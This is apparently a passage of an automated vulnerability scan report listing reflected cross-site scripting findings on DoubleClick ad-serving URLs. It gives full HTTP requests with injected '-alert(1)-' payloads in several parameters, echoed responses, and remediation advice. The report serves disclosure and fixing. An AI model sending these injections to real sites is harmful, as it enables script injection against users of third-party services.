GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=12f8f"-alert(1)-"d4934f0edbb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7347
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 15:36:56 GMT
Expires: Sun, 13 Feb 2011 15:36:56 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... VzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=12f8f"-alert(1)-"d4934f0edbbhttps://www.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx?lang=EN&WT.mc_id=zWHWABB0US1HN2DMH3DCDA4MNMP7HE840268&cssiteid=1004575&csdartid=5808780039988527"); var fscUrl = url; var fscUrlClickT ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2c86"-alert(1)-"c09914b1c27 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADEe2c86"-alert(1)-"c09914b1c27&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 15:34:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADEe2c86"-alert(1)-"c09914b1c27&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b63f7"-alert(1)-"22f334cffd9 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912b63f7"-alert(1)-"22f334cffd9&adurl=;ord=224297922? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 15:36:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912b63f7"-alert(1)-"22f334cffd9&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA4MNMP7HE840268%26cssiteid%3D1004575%26csdartid%3D5808780039988527"); var fs ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b559"-alert(1)-"8ad9d64ed89 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=12b559"-alert(1)-"8ad9d64ed89&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 15:35:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=12b559"-alert(1)-"8ad9d64ed89&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA4MNMP7 ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93325"-alert(1)-"9802dba7be4 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA93325"-alert(1)-"9802dba7be4&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 15:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... c8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA93325"-alert(1)-"9802dba7be4&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx%3Flang%3DEN%26WT.mc_id%3DzWHWABB0US1HN2DMH3DCDA4MNMP7HE840268%26cssiteid%3D1004575%26csdarti ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d517c"-alert(1)-"55dc8e75f24 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=Ld517c"-alert(1)-"55dc8e75f24&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=;ord=224297922? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 15:33:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7413
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/19c/%2a/r%3B234353572%3B0-0%3B0%3B58087800%3B3454-728/90%3B39988527/40006314/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=Ld517c"-alert(1)-"55dc8e75f24&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mt ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59de7"-alert(1)-"43d015177ff was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=59de7"-alert(1)-"43d015177ff HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7021
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 17:02:03 GMT
Expires: Sun, 13 Feb 2011 17:02:03 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... LWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=59de7"-alert(1)-"43d015177ffhttp://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167474"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4152"-alert(1)-"49a024bfa21 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxAf4152"-alert(1)-"49a024bfa21&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 16:59:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7051
